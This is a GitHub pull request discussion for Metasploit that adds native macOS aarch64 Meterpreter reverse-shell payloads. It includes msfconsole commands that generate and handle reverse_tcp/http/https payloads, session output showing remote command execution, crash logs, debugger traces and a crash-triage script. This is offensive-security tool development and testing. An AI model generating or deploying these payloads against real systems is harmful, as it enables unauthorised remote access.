
M1ssion Dyld Mettle: Aarch64 Payloads #17129

Merged
merged 15 commits into from
Aug 2, 2023

Conversation

usiegl00
Contributor

@usiegl00 usiegl00 commented Oct 11, 2022

This builds on Back from the dyld by adding the required aarch64 assembly code to enable the OSX loader to run on the M1. This enables the use of native payloads on M1 or M2 devices that do not have Rosetta installed.

Verification steps

See #17050

Compile steps:

# stager
bash -c "cd external/source/shellcode/osx/stager; make clean install"


# template
bash -c "cd external/source/shellcode/osx/template; make clean install"

Modules to test, ensure that you can run chmod +x ./shell; ./shell in a separate tab and that a new session opens, as well as the test suite passing:

## Load test suite against a session example
loadpath test/modules
use test/all
run session=-1


############### arch

### stageless
jobs -K
sessions -K
use osx/aarch64/meterpreter_reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler

jobs -K
sessions -K
use osx/aarch64/meterpreter_reverse_http
generate -f macho -o shell lhost=127.0.0.1
to_handler

jobs -K
sessions -K
use osx/aarch64/meterpreter_reverse_https
generate -f macho -o shell lhost=127.0.0.1
to_handler

### staged
jobs -K
sessions -K
use osx/aarch64/meterpreter/reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler

############### intel

### stageless

jobs -K
sessions -K
use osx/x64/meterpreter_reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler

### staged
jobs -K
sessions -K
use osx/x64/meterpreter/reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler

@gwillcox-r7 gwillcox-r7 added library payload needs-linting The module needs additional work to pass our automated linting rules labels Oct 11, 2022
@github-actions

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@timwr
Contributor

timwr commented Oct 13, 2022

Presumably this needs a corresponding pull request to mettle to support building aarch64? Nice work btw!

@space-r7
Contributor

#17050 has been landed, so you should be able to rebase and pull in those changes. This is really great, thanks for adding this!

@jmartin-tech
Contributor

jmartin-tech commented Mar 2, 2023

rapid7/mettle#237 should contain the required mettle artifacts to move this forward. Using metasploit_payloads-mettle v1.0.23.

Contributor

@space-r7 space-r7 left a comment


A couple of small suggestions and noted an issue with the stageless payload.

@space-r7 space-r7 self-assigned this Mar 3, 2023
@usiegl00 usiegl00 requested a review from space-r7 March 4, 2023 09:53
Contributor

@space-r7 space-r7 left a comment


Just one comment on the new code signature additions. Here's the output from testing the updates:

msf6 payload(osx/aarch64/meterpreter/reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (812819 bytes) to 192.168.157.1
[-] Meterpreter session 3 is not valid and will be closed
[*] 192.168.157.1 - Meterpreter session 3 closed.

msf6 payload(osx/aarch64/meterpreter/reverse_tcp) > use payload/osx/aarch64/meterpreter_reverse_tcp
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > generate -f macho -o /Users/sherbs/Desktop/payload_stageless LHOST=192.168.157.1
[*] Writing 812819 bytes to /Users/sherbs/Desktop/payload_stageless...
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on [192.168.157.1:4444](http://192.168.157.1:4444/)
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > [*] 192.168.157.1 - Meterpreter session 4 closed.  Reason: Died
[*] Meterpreter session 5 opened ([192.168.157.1:4444](http://192.168.157.1:4444/) -> [192.168.157.1:61786](http://192.168.157.1:61786/)) at 2023-03-06 16:52:51 -0600

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: sherbs
meterpreter > sysinfo
Computer     : nostromo.local
OS           : macOS Ventura (macOS 13.2.0)
Architecture : arm64
BuildTuple   : aarch64-apple-darwin
Meterpreter  : aarch64/osx
meterpreter >

The first two attempts are with the staged payload, which appears to send the midstager and stage across, but reports back as closed before establishing a session. The stageless payload achieved a session, which is the last attempt in the output.

msftidy is outputting that modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb, modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb, and modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb have formatting errors in them. You can run rubocop -a on those files to fix the issues, and that should get the linter tests to pass.

@usiegl00
Contributor Author

usiegl00 commented Mar 7, 2023

@space-r7 Is the staged payload crashing every time on your machine? It's crashing about 1/5 times on mine. I am working on a fix, but it's not pretty. :-P

@space-r7
Contributor

space-r7 commented Mar 7, 2023

@space-r7 Is the staged payload crashing every time on your machine? It's crashing about 1/5 times on mine. I am working on a fix, but it's not pretty. :-P

Yea, it's happened for me every time so far

@usiegl00
Contributor Author

usiegl00 commented Mar 8, 2023

@space-r7 Does the most recent commit fix your issue? If not, would you please send me a crash report from Console.app?

@space-r7
Contributor

space-r7 commented Mar 9, 2023

@space-r7 Does the most recent commit fix your issue? If not, would you please send me a crash report from Console.app?

Sorry, I should have worded myself better. It's not that the process is actually crashing for the staged payload, just that once the Sending stage.. message is displayed, Metasploit then outputs that the session is invalid, and then the session is closed. The new changes haven't affected this so far. I'll try to do some debugging to better help with this.

@usiegl00
Contributor Author

usiegl00 commented Mar 9, 2023

Alright, is there any output on the cli running the staged payload like Bus error: 10 or Segmentation Fault: 11?
Would you remove the //#define DEBUG in main.c and run it again to get more verbose output?
What OS / Hardware are you using? I'm on Monterey with an M1.

@space-r7
Contributor

space-r7 commented Mar 9, 2023

Sorry for the delay! Here's my output from executing a staged payload:

sherbs@nostromo -> Desktop ./payload
main!
hello world!
good symbol!
gDyld found, using dual hijack technique.
apis: %lld
config: %i
base: %lld
sdyld: %lld

It appears to hang at the sdyld line. I'm testing this on Ventura 13.2 with an M1.

@usiegl00
Contributor Author

Thanks @space-r7! I've found that the symbol mangling has changed in Ventura. I'm working on a fix.

@usiegl00
Contributor Author

@space-r7 I've just got it working on Ventura 13.3 Beta, going to clean up the code a bit and push my changes.

@space-r7
Contributor

Thanks! The payload managed to get much further this time; however, I'm now getting a bus error:

sherbs@nostromo -> Desktop ./payload
zsh: bus error  ./payload
sherbs@nostromo -> Desktop ./payload
main!
hello world!
good symbol!
gDyld found, using dual hijack technique.
apis: %lld
config: %i
base: %lld
sdyld: %lld
Ventura!
Errno: %lld
Buffer: %lld
Analyzing Segments.
vmSpace: %lld
Translated: %s
VMAllocate Ret: %lld
LoadAddress: %lld
Region Ptrs: %lld
usedCount: %lld
allocCount: %lld
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Loaded Size: %lld
Loaded first: %lld
Loaded Capacity: %lld
Apis: %lld
LoadAddress: %lld
JITLMP: %lld
zsh: bus error  ./payload

@usiegl00
Contributor Author

usiegl00 commented Mar 20, 2023

Hi @space-r7, you wouldn't happen to have a crash log in Console.app?

@space-r7
Contributor

Yep, here's the message:

Sending event: com.apple.stability.crash {"coalitionName":"com.apple.Terminal","exceptionCodes":"0x0000000000000002, 0x00000001047b44d0(\n    2,\n    4370154704\n)EXC_BAD_ACCESSSIGBUSKERN_PROTECTION_FAILURE at 0x00000001047b44d0","incidentID":"0C94A929-FE0E-4AC0-B231-8BA024F547E3","logwritten":1,"process":"payload_staged.macho","responsibleApp":"Terminal","terminationReasonExceptionCode":"0xa","terminationReasonNamespace":"SIGNAL"}

And the full crash report:

sherbs@nostromo -> Desktop cat /Users/sherbs/Library/Logs/DiagnosticReports/payload_staged.macho-2023-03-21-140831.ips
{"app_name":"payload_staged.macho","timestamp":"2023-03-21 14:08:31.00 -0500","app_version":"","slice_uuid":"66f0bdc4-e561-3f11-a616-f4817bcbbdd3","build_version":"","platform":1,"share_with_app_devs":0,"is_first_party":1,"bug_type":"309","os_version":"macOS 13.2 (22D49)","roots_installed":0,"incident_id":"0C94A929-FE0E-4AC0-B231-8BA024F547E3","name":"payload_staged.macho"}
{
  "uptime" : 200000,
  "procRole" : "Unspecified",
  "version" : 2,
  "userID" : 501,
  "deployVersion" : 210,
  "modelCode" : "MacBookPro17,1",
  "coalitionID" : 1904,
  "osVersion" : {
    "train" : "macOS 13.2",
    "build" : "22D49",
    "releaseType" : "User"
  },
  "captureTime" : "2023-03-21 14:08:31.3689 -0500",
  "incident" : "0C94A929-FE0E-4AC0-B231-8BA024F547E3",
  "pid" : 80546,
  "translated" : false,
  "cpuType" : "ARM-64",
  "roots_installed" : 0,
  "bug_type" : "309",
  "procLaunch" : "2023-03-21 14:08:30.8416 -0500",
  "procStartAbsTime" : 4820963989912,
  "procExitAbsTime" : 4820976635370,
  "procName" : "payload_staged.macho",
  "procPath" : "\/Users\/USER\/Desktop\/payload_staged.macho",
  "parentProc" : "zsh",
  "parentPid" : 26216,
  "coalitionName" : "com.apple.Terminal",
  "crashReporterKey" : "AD9892D9-18C8-AF3E-C8D9-D6D0A9CCB814",
  "responsiblePid" : 2309,
  "responsibleProc" : "Terminal",
  "wakeTime" : 357,
  "sleepWakeUUID" : "378FF9AA-A682-439F-AFA1-74D5F82A8645",
  "sip" : "enabled",
  "vmRegionInfo" : "0x1047b44d0 is in 0x1047b4000-0x1047f4000;  bytes after start: 1232  bytes before end: 260911\n      REGION TYPE                    START - END         [ VSIZE] PRT\/MAX SHRMOD  REGION DETAIL\n      __LINKEDIT                  1047b0000-1047b4000    [   16K] r--\/r-- SM=COW  ..._staged.macho\n--->  dyld private memory         1047b4000-1047f4000    [  256K] r--\/rwx SM=PRV  \n      VM_ALLOCATE                 1047f4000-1047f8000    [   16K] r-x\/rwx SM=PRV  ",
  "exception" : {"codes":"0x0000000000000002, 0x00000001047b44d0","rawCodes":[2,4370154704],"type":"EXC_BAD_ACCESS","signal":"SIGBUS","subtype":"KERN_PROTECTION_FAILURE at 0x00000001047b44d0"},
  "termination" : {"flags":0,"code":10,"namespace":"SIGNAL","indicator":"Bus error: 10","byProc":"exc handler","byPid":80546},
  "vmregioninfo" : "0x1047b44d0 is in 0x1047b4000-0x1047f4000;  bytes after start: 1232  bytes before end: 260911\n      REGION TYPE                    START - END         [ VSIZE] PRT\/MAX SHRMOD  REGION DETAIL\n      __LINKEDIT                  1047b0000-1047b4000    [   16K] r--\/r-- SM=COW  ..._staged.macho\n--->  dyld private memory         1047b4000-1047f4000    [  256K] r--\/rwx SM=PRV  \n      VM_ALLOCATE                 1047f4000-1047f8000    [   16K] r-x\/rwx SM=PRV  ",
  "extMods" : {"caller":{"thread_create":0,"thread_set_state":0,"task_for_pid":0},"system":{"thread_create":0,"thread_set_state":88,"task_for_pid":10},"targeted":{"thread_create":0,"thread_set_state":0,"task_for_pid":0},"warnings":0},
  "faultingThread" : 0,
  "threads" : [{"triggered":true,"id":4324065,"threadState":{"x":[{"value":255},{"value":4371954168},{"value":0},{"value":4371954008},{"value":4371954392},{"value":65536},{"value":14942208},{"value":4371953999},{"value":4370154704},{"value":4370176544},{"value":0},{"value":4371954225},{"value":4371954185},{"value":3},{"value":5},{"value":18446744073709551615},{"value":8820469072,"symbolLocation":72,"symbol":"vtable for lsl::PersistentAllocator"},{"value":1461699562878905680,"symbolLocation":1461699554058436680,"symbol":"vtable for lsl::PersistentAllocator"},{"value":0},{"value":4370153472},{"value":4371954208},{"value":16},{"value":18446744073709551600},{"value":4371954186},{"value":240},{"value":4370154576},{"value":16},{"value":15},{"value":224}],"flavor":"ARM_THREAD_STATE64","lr":{"value":7257480984},"cpsr":{"value":2147487744},"fp":{"value":4371954368},"sp":{"value":4371954112},"esr":{"value":2449473615,"description":"(Data Abort) byte write Permission fault"},"pc":{"value":7257481076,"matchesCrashFrame":1},"far":{"value":4370154704}},"queue":"com.apple.main-thread","frames":[{"imageOffset":196468,"symbol":"lsl::PersistentAllocator::allocate_buffer(unsigned long, unsigned long, unsigned long, lsl::Allocator**)","symbolLocation":308,"imageIndex":0},{"imageOffset":196376,"symbol":"lsl::PersistentAllocator::allocate_buffer(unsigned long, unsigned long, unsigned long, lsl::Allocator**)","symbolLocation":216,"imageIndex":0},{"imageOffset":192992,"symbol":"lsl::Allocator::aligned_alloc(unsigned long, unsigned long)","symbolLocation":180,"imageIndex":0},{"imageOffset":144456,"symbol":"dyld4::JustInTimeLoader::make(dyld4::RuntimeState&, dyld3::MachOFile const*, char const*, dyld4::FileID const&, unsigned long long, bool, bool, bool, unsigned short, mach_o::Layout const*)","symbolLocation":156,"imageIndex":0},{"imageOffset":4370454392,"imageIndex":1},{"imageOffset":24144,"symbol":"start","symbolLocation":2544,"imageIndex":0}]}],
  "usedImages" : [
  {
    "source" : "P",
    "arch" : "arm64e",
    "base" : 7257284608,
    "size" : 568228,
    "uuid" : "fe8a9d9e-f65d-34ca-942c-175b99c0601b",
    "path" : "\/usr\/lib\/dyld",
    "name" : "dyld"
  },
  {
    "size" : 0,
    "source" : "A",
    "base" : 0,
    "uuid" : "00000000-0000-0000-0000-000000000000"
  }
],
  "sharedCache" : {
  "base" : 7256637440,
  "size" : 3447406592,
  "uuid" : "3366b98c-6b8a-3546-8233-dc167320439f"
},
  "vmSummary" : "ReadOnly portion of Libraries: Total=772.8M resident=0K(0%) swapped_out_or_unallocated=772.8M(100%)\nWritable regions: Total=530.3M written=0K(0%) resident=0K(0%) swapped_out=0K(0%) unallocated=530.3M(100%)\n\n                                VIRTUAL   REGION \nREGION TYPE                        SIZE    COUNT (non-coalesced) \n===========                     =======  ======= \nKernel Alloc Once                   32K        1 \nMALLOC                           137.2M       11 \nMALLOC guard page                   96K        5 \nMALLOC_NANO (reserved)           384.0M        1         reserved VM address space (unallocated)\nStack                             8176K        1 \nStack Guard                       56.0M        1 \nVM_ALLOCATE                       1952K        9 \nVM_ALLOCATE (reserved)              48K        1         reserved VM address space (unallocated)\n__AUTH                              46K       11 \n__AUTH_CONST                        70K       38 \n__DATA                             191K       37 \n__DATA_CONST                       188K       40 \n__DATA_DIRTY                        78K       22 \n__LINKEDIT                       767.8M        2 \n__OBJC_CONST                        11K        5 \n__OBJC_RO                         65.5M        1 \n__OBJC_RW                         1988K        1 \n__TEXT                            5120K       42 \ndyld private memory                256K        1 \nshared memory                       16K        1 \n===========                     =======  ======= \nTOTAL                              1.4G      231 \nTOTAL, minus reserved VM space     1.0G      231 \n",
  "legacyInfo" : {
  "threadTriggered" : {
    "queue" : "com.apple.main-thread"
  }
},
  "trialInfo" : {
  "rollouts" : [
    {
      "rolloutId" : "5fb4245a1bbfe8005e33a1e1",
      "factorPackIds" : {

      },
      "deploymentId" : 240000021
    },
    {
      "rolloutId" : "60f8ddccefea4203d95cbeef",
      "factorPackIds" : {

      },
      "deploymentId" : 240000025
    }
  ],
  "experiments" : [

  ]
}
}
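
A triage helper for the .ips report above, added here as an example and not part of this PR or of Metasploit: it splits the report into its one-line JSON header and JSON body, renders the faulting thread's frames, finds the region the kernel flagged with ---> in vmRegionInfo, and checks the fault address and access kind against that region's current protection. The embedded report is a constructed, trimmed copy of the one posted above, with identifiers not needed for triage dropped or replaced by placeholders.

```python
"""Triage a macOS .ips crash report: one JSON header line followed by a JSON body."""
import json
import re
from typing import Any, Optional

# Constructed sample: a trimmed copy of the report posted in this thread (same exception,
# thread state, frames and region table); fields not needed for triage were dropped.
SAMPLE_IPS = r'''{"app_name":"payload_staged.macho","bug_type":"309","os_version":"macOS 13.2 (22D49)","incident_id":"PLACEHOLDER-INCIDENT-ID","name":"payload_staged.macho"}
{
  "procName" : "payload_staged.macho", "cpuType" : "ARM-64", "translated" : false,
  "vmRegionInfo" : "0x1047b44d0 is in 0x1047b4000-0x1047f4000;  bytes after start: 1232  bytes before end: 260911\n      REGION TYPE                    START - END         [ VSIZE] PRT\/MAX SHRMOD  REGION DETAIL\n      __LINKEDIT                  1047b0000-1047b4000    [   16K] r--\/r-- SM=COW  ..._staged.macho\n--->  dyld private memory         1047b4000-1047f4000    [  256K] r--\/rwx SM=PRV  \n      VM_ALLOCATE                 1047f4000-1047f8000    [   16K] r-x\/rwx SM=PRV  ",
  "exception" : {"codes":"0x0000000000000002, 0x00000001047b44d0","rawCodes":[2,4370154704],"type":"EXC_BAD_ACCESS","signal":"SIGBUS","subtype":"KERN_PROTECTION_FAILURE at 0x00000001047b44d0"},
  "faultingThread" : 0,
  "threads" : [{"triggered":true,
    "threadState":{"esr":{"value":2449473615,"description":"(Data Abort) byte write Permission fault"},"pc":{"value":7257481076},"far":{"value":4370154704}},
    "frames":[{"imageOffset":196468,"symbol":"lsl::PersistentAllocator::allocate_buffer(unsigned long, unsigned long, unsigned long, lsl::Allocator**)","symbolLocation":308,"imageIndex":0},
              {"imageOffset":192992,"symbol":"lsl::Allocator::aligned_alloc(unsigned long, unsigned long)","symbolLocation":180,"imageIndex":0},
              {"imageOffset":144456,"symbol":"dyld4::JustInTimeLoader::make(...)","symbolLocation":156,"imageIndex":0},
              {"imageOffset":4370454392,"imageIndex":1},
              {"imageOffset":24144,"symbol":"start","symbolLocation":2544,"imageIndex":0}]}],
  "usedImages" : [{"source":"P","arch":"arm64e","base":7257284608,"size":568228,"path":"\/usr\/lib\/dyld","name":"dyld"},
                  {"size":0,"source":"A","base":0}]
}'''

# The region table line the kernel marks with '--->' is the one holding the fault address.
REGION_RE = re.compile(
    r"^--->\s+(?P<type>.+?)\s+(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+"
    r"\[[^\]]*\]\s+(?P<prot>[rwx-]{3})/(?P<max>[rwx-]{3})"
)

def parse_ips(text: str) -> tuple[dict, dict]:
    """Split the report into its one-line JSON header and the JSON body that follows it."""
    header_line, _, body = text.partition("\n")
    return json.loads(header_line), json.loads(body)

def fault_region(vm_region_info: str) -> Optional[dict[str, Any]]:
    """Return the '--->' region (type, address range, current and maximum protection)."""
    for line in vm_region_info.split("\n"):
        m = REGION_RE.match(line)
        if m:
            return {"type": m["type"], "start": int(m["start"], 16), "end": int(m["end"], 16),
                    "prot": m["prot"], "max": m["max"]}
    return None

def faulting_frames(body: dict) -> list[str]:
    """Render the faulting thread's backtrace as 'image!symbol+off' or 'image+0xoff'."""
    images = body.get("usedImages", [])
    thread = body["threads"][body["faultingThread"]]
    rendered = []
    for fr in thread["frames"]:
        idx = fr.get("imageIndex", -1)
        name = images[idx].get("name", "<unnamed>") if 0 <= idx < len(images) else "<unknown>"
        if "symbol" in fr:
            rendered.append(f"{name}!{fr['symbol']}+{fr['symbolLocation']}")
        else:
            rendered.append(f"{name}+0x{fr['imageOffset']:x}")
    return rendered

def triage(text: str) -> dict[str, Any]:
    """What a first-pass reader needs: signal, access kind, fault address vs. its region, frames."""
    header, body = parse_ips(text)
    thread = body["threads"][body["faultingThread"]]
    state = thread["threadState"]
    far, pc = state["far"]["value"], state["pc"]["value"]   # fault address and faulting pc
    region = fault_region(body["vmRegionInfo"])
    esr = state.get("esr", {}).get("description", "")       # arm64 syndrome register text
    access = "write" if "write" in esr else "read" if "read" in esr else "unknown"
    in_region = region is not None and region["start"] <= far < region["end"]
    # pc minus the base of frame 0's image must equal that frame's imageOffset
    pc_offset = pc - body["usedImages"][thread["frames"][0]["imageIndex"]]["base"]
    note = ""
    if in_region and access == "write" and "w" not in region["prot"]:
        note = (f"write to '{region['type']}' mapped {region['prot']} (max {region['max']}): "
                "the page is not writable at fault time")
    return {"process": header["name"], "os": header["os_version"],
            "exception": body["exception"]["type"], "signal": body["exception"]["signal"],
            "subtype": body["exception"]["subtype"], "access": access, "fault_address": far,
            "fault_in_region": in_region, "region": region, "pc_image_offset": pc_offset,
            "frames": faulting_frames(body), "note": note}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_IPS), indent=2))
```

On the sample this reports a byte write from lsl::PersistentAllocator::allocate_buffer into "dyld private memory" that is currently mapped r-- with a maximum of rwx, which is the same conclusion the next comment reaches about lsl::Allocator::malloc.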

@usiegl00
Contributor Author

Thanks! It looks like calling lsl::Allocator::malloc is going to crash. I'll have to replicate the function with vm_allocate instead...

@Ishaanahuja7

Any update on this? @usiegl00 @space-r7

@usiegl00
Contributor Author

usiegl00 commented May 7, 2023

Any update on this? @usiegl00 @space-r7

Sorry, just had some personal stuff to deal with last month. I'll be continuing to work on this soon.

@adfoster-r7
Contributor

Looks like this needs a rebase and rubocop run on the files 👍

@usiegl00
Contributor Author

@adfoster-r7 Sonoma previewed recently, so I'm going to be working on it.

@space-r7 space-r7 removed their assignment Jun 16, 2023
This adds support for the dyld changes incorporated into Sonoma and
cleans up the existing support for Ventura. This does not break
compatibility with previous versions.
@usiegl00 usiegl00 requested a review from space-r7 June 20, 2023 11:00
@gwillcox-r7 gwillcox-r7 removed the needs-linting The module needs additional work to pass our automated linting rules label Jun 23, 2023
@Ishaanahuja7

@space-r7 Please approve and merge

@adfoster-r7
Contributor

adfoster-r7 commented Jul 6, 2023

To the tester:

  • We should have access to test hardware on our side
  • It looks like a few other commits are coming along with this which we should quickly verify as working as well, i.e. 1.0.20 to the version on this PR. It might be easier to put up a separate PR for this version bump in isolation
  • Looks like we'll want to recompile the payloads ourselves too to verify the bytes align

@adfoster-r7 adfoster-r7 self-assigned this Jul 10, 2023
This updates the aarch64 payloads to include comments with the
corresponding instructions for each little-endian integer. It also fixes
the debug output for x64 payloads under rosetta.
Contributor

@adfoster-r7 adfoster-r7 left a comment


🟢 Stageless osx/aarch64/meterpreter_reverse_tcp works:

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > 
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(65536 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1
[*] Meterpreter session 8 opened (127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1 -C getuid
[*] Running 'getuid' on meterpreter session 8 (127.0.0.1)
Server username: jenkins

🔴 Hitting issues with the osx/aarch64/meterpreter/reverse_tcp payload

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > setg sessiontlvlogging true
sessiontlvlogging => true
msf6 payload(osx/aarch64/meterpreter/reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=16 command=core_negotiate_tlv_encryption>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="15140495648546938480501506891891">
  #<Rex::Post::Meterpreter::Tlv type=RSA_PUB_KEY     meta=RAW        value="0\x82\x01\"0\r\x06\t*\x86H\x86\xF7\r\x01\x01\x01\ ...">
]>

msf6 payload(osx/aarch64/meterpreter/reverse_tcp) >
[-] Meterpreter session 4 is not valid and will be closed
[*] 127.0.0.1 - Meterpreter session 4 closed.

Stager output:

% ./shell
zsh: segmentation fault  ./shell

Steps leading up to the failure

(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0ec
->  0x10020c0ec: add    x0, x0, #0x20, lsl #12    ; =0x20000 
    0x10020c0f0: mov    sp, x0
    0x10020c0f4: mov    x0, x13
    0x10020c0f8: blr    x15
Target 0: (shell) stopped.
(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0f0
->  0x10020c0f0: mov    sp, x0
    0x10020c0f4: mov    x0, x13
    0x10020c0f8: blr    x15
    0x10020c0fc: mov    x0, #0x0
Target 0: (shell) stopped.
(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0f4
->  0x10020c0f4: mov    x0, x13
    0x10020c0f8: blr    x15
    0x10020c0fc: mov    x0, #0x0
    0x10020c100: ldr    x16, #0x40
Target 0: (shell) stopped.
(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0f8
->  0x10020c0f8: blr    x15
    0x10020c0fc: mov    x0, #0x0
    0x10020c100: ldr    x16, #0x40
    0x10020c104: svc    #0
Target 0: (shell) stopped.
(lldb) reg read
General Purpose Registers:
        x0 = 0x0000000000000003
        x1 = 0x0000000000000000
        x2 = 0x0000000000000003
        x3 = 0x0000000000001002
        x4 = 0x0000000000000000
        x5 = 0x0000000000000000
        x6 = 0x0000000000000000
        x7 = 0x0000000000000000
        x8 = 0x0000000100208000
        x9 = 0x0000000000000002
       x10 = 0x00000000000c6713
       x11 = 0x0000000100220000
       x12 = 0x0000000100220000
       x13 = 0x0000000000000003
       x14 = 0x0000000000001f40
       x15 = 0x0000000100211dd4
       x16 = 0x00000000020000c5
       x17 = 0x00000001fbc91e40  (void *)0x00000001a1b8b0d0: _platform_memmove
       x18 = 0x0000000000000000
       x19 = 0x00000001000c4060
       x20 = 0x0000000100003ef8  shell`main
       x21 = 0x0000000100070070  dyld`dyld4::sConfigBuffer
       x22 = 0x0000000000000000
       x23 = 0x0000000000000000
       x24 = 0x0000000000000000
       x25 = 0x0000000000000000
       x26 = 0x0000000000000000
       x27 = 0x0000000000000000
       x28 = 0x0000000000000000
        fp = 0x000000016fdff1b0
        lr = 0x0000000100003f7c  shell`main + 132
        sp = 0x0000000100420000
        pc = 0x000000010020c0f8
      cpsr = 0x00001000

(lldb) step
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100211dd4
->  0x100211dd4: ldr    x2, [x9, #0x280]
    0x100211dd8: add    x3, sp, #0x1c8
    0x100211ddc: mov    w9, #0x1
    0x100211de0: and    w4, w9, #0x1
Target 0: (shell) stopped.
(lldb) next
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x282)
    frame #0: 0x0000000100211dd4
->  0x100211dd4: ldr    x2, [x9, #0x280]
    0x100211dd8: add    x3, sp, #0x1c8
    0x100211ddc: mov    w9, #0x1
    0x100211de0: and    w4, w9, #0x1
Target 0: (shell) stopped.

I believe it's dying on the call to osx main in x15; I'm testing on an M1 machine running in UTM with Monterey 12.6. Unfortunately I'm running with a slightly janky setup currently which makes it awkward to debug further - if there aren't enough details to fix the crash - I'll try to get access to a different setup/get more details 👍

@usiegl00
Contributor Author

usiegl00 commented Aug 1, 2023

Yes, the crash was due to the recvfrom syscall reading too many bytes (0x1000). I'll go back to the exact 328 stager size.

This fixes an issue with the stager size in the osx aarch64 payloads. It
also adds the source and Makefile for template_aarch64_darwin.bin
@adfoster-r7
Contributor

@usiegl00 Thanks! I've run this through on 11.7.8 on AWS, and 12.6 on M1 in UTM. I've sent a PR for updating the Makefile for the template setup and compiling the binaries. I'll do a final pass on 13.x tomorrow

…and-compile-binaries

Update osx templates makefile and compile binaries
@adfoster-r7
Contributor

Finished testing with Ventura 13.4.1 on AWS now too, all looks good to me! 🥳

@adfoster-r7 adfoster-r7 merged commit 9a40e26 into rapid7:master Aug 2, 2023
32 checks passed
@adfoster-r7
Contributor

adfoster-r7 commented Aug 2, 2023

Release Notes

Adds new support for multiple OSX AArch64 payloads: osx/aarch64/meterpreter/reverse_tcp, osx/aarch64/meterpreter_reverse_https, osx/aarch64/meterpreter_reverse_tcp, osx/aarch64/meterpreter_reverse_http. This enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 2, 2023
@adfoster-r7
Contributor

Thanks for the awesome work @usiegl00 🎉

@adfoster-r7 adfoster-r7 added the hotness Something we're really excited about label Aug 2, 2023